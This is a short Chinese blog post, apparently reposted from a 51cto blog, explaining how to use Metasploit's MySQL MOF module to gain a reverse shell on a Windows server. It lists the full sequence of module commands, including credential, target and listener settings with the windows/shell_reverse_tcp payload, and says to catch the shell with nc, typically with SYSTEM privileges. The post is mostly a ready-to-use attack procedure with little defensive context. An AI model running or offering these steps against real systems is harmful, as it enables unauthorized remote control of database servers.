码迷,mamicode.com
首页 > 数据库 > 详细

mysql mof+metasploit反弹shell

时间:2017-10-25 23:38:29      阅读:209      评论:0      收藏:0      [点我收藏+]

标签:mysql   提权   

鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权

metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网

use exploit/windows/mysql/mysql_mof
set password xxx    //设置登录mysql的密码
set username xxx    //设置登录mysql的用户
set rhost xxx       //设置要登录的ip地址
set rport xxxx      //设置mysql的端口号
set payload windows/shell_reverse_tcp    //所使用的反弹模块
set lhost xxx       //反弹到的ip地址
set lport xxx       //反弹到的端口
show options        //设置完成后,使用该命令可查看设置参数情况
exploit             //执行


技术分享

如没问题,即exploit执行

这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行

技术分享


错误之处,敬请指正

本文出自 “z2p的博客” 博客,请务必保留此出处http://z2ppp.blog.51cto.com/11186185/1975993

mysql mof+metasploit反弹shell

标签:mysql   提权   

原文地址:http://z2ppp.blog.51cto.com/11186185/1975993

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!